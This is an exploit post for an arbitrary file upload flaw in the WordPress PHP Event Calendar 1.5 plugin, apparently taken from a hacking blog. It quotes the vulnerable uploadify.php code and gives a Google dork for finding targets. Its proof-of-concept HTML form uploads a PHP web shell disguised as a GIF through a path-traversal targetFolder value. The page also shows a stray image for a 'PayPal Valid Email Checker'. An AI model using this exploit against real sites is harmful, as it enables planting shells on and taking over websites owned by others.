WordPress PHP Event Calendar 1.5 Arbitrary File Upload
#- Title: WordPress PHP Event Calendar Arbitrary File Upload
#- Author: CrashBandicot
#- Date: 04/02/2015
#- Vendor : phpeventcalendar. com
#- Developer : -
#- Link Download : Wordpress. org/plugins/php-event-calendar/
#- Google Dork: inurl:wp-content/plugins/php-event-calendar/
#- Tested on : MSwin
#- Fixed in Version : > 1.5
=======================================================================
&- Vulnerability : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php ( "Uploadify.php" )
Bug Code :
<?php
/*
Uploadify
Copyright (c) 2012 Reactive Apps, Ronnie Garcia
Released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
// Define a destination
//$targetFolder = '/uploads'; // Relative to the root
$targetFolder = $_POST['targetFolder']; // wp upload directory
$dir = str_replace('\\','/',dirname(__FILE__));
//$verifyToken = md5('unique_salt' . $_POST['timestamp']);
if (!empty($_FILES)) {
$tempFile = $_FILES['Filedata']['tmp_name'];
//$targetPath = $dir.$targetFolder;
$targetPath = $targetFolder;
$fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name'];
$targetFile = rtrim($targetPath,'/') . '/' . $fileName;
// Validate the file type
$fileTypes = array('jpg','jpeg','gif','png'); // File extensions
$fileParts = pathinfo($_FILES['Filedata']['name']);
if (in_array($fileParts['extension'],$fileTypes)) {
move_uploaded_file($tempFile,$targetFile);
echo '1';
} else {
echo 'Invalid file type.';
}
&- When Vulnerable : *Blank*
Proof Of Concept :
Material : Sh3ll.php.gif (if support) / Upload image.gif
HTML Code :
<div><form action="http://3xploi7.com/wp-content/plugins/php-event-calendar/server/classes/uploadify.php" method="post" enctype="multipart/form-data">
<input type="file" name="Filedata" id="file" ><br>
<input type="text" name="targetFolder" value="../../../../../" id="file" ><br>
<input type="text" name="user_id" value="3xploi7" id="file" ><br>
<input type="submit" name="submit" value="3xploi7ed !" >
</form></div>Shell Acces ? Here
![PayPal Valid Email Checker [ Fresh ]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw2hirazgCSjnRiI2pxJi1EIRtT55i5R5r0HV0MRZIQeM_ae8SDaA4RZZiSiHUAyGWfNG7LPSGht2vJ8iuPndIUVWI1KG8nJI9WbSQz7frr58CZXA2ct06MfLacGWr3ZzxUZNBDLV_FPqN/s72-c/11174309_801920939904995_5687906876809212415_o.jpg)
Post a Comment